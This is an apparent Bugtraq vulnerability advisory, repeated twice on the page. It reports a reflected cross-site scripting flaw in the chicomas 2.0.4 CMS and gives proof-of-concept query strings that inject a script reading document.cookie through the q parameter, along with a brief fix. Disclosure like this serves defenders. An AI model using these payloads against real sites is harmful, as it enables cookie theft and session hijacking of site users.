Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
chicomas.2.0.4
May 02 2008 04:36PM
hadikiamarsi hotmail com
Author : Hadi Kiamarsi
------------------------------------------------------------------------
----------
Discovered by : Hadi Kiamarsi
------------------------------------------------------------------------
----------
Exploited By : Hadi Kiamarsi
------------------------------------------------------------------------
----------
E-Mail : hadikiamarsi[at]hotmail.com
------------------------------------------------------------------------
----------
WebSite : http://ircrash.com
------------------------------------------------------------------------
----------
Our Team : ircrash
------------------------------------------------------------------------
----------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
------------------------------------------------------------------------
----------
CMS: chicomas.2.0.4
Download CMS : http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip
------------------------------------------------------------------------
----------
Exploit :
Method = POST
query : http://www.example.com/[chicomas]/index.php?q=>"><script>alert(document.
cookie)</script>
query : http://www.example.com/[chicomas]/index.php?q="><script>alert(document.c
ookie)</script>
------------------------------------------------------------------------
-----------
Solution :
you must filter special character in input via htmlspecialchar() function
------------------------------------------------------------------------
-----------
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Author : Hadi Kiamarsi
------------------------------------------------------------------------
----------
Discovered by : Hadi Kiamarsi
------------------------------------------------------------------------
----------
Exploited By : Hadi Kiamarsi
------------------------------------------------------------------------
----------
E-Mail : hadikiamarsi[at]hotmail.com
------------------------------------------------------------------------
----------
WebSite : http://ircrash.com
------------------------------------------------------------------------
----------
Our Team : ircrash
------------------------------------------------------------------------
----------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
------------------------------------------------------------------------
----------
CMS: chicomas.2.0.4
Download CMS : http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip
------------------------------------------------------------------------
----------
Exploit :
Method = POST
query : http://www.example.com/[chicomas]/index.php?q=>"><script>alert(document.
cookie)</script>
query : http://www.example.com/[chicomas]/index.php?q="><script>alert(document.c
ookie)</script>
------------------------------------------------------------------------
-----------
Solution :
you must filter special character in input via htmlspecialchar() function
------------------------------------------------------------------------
-----------
[ reply ]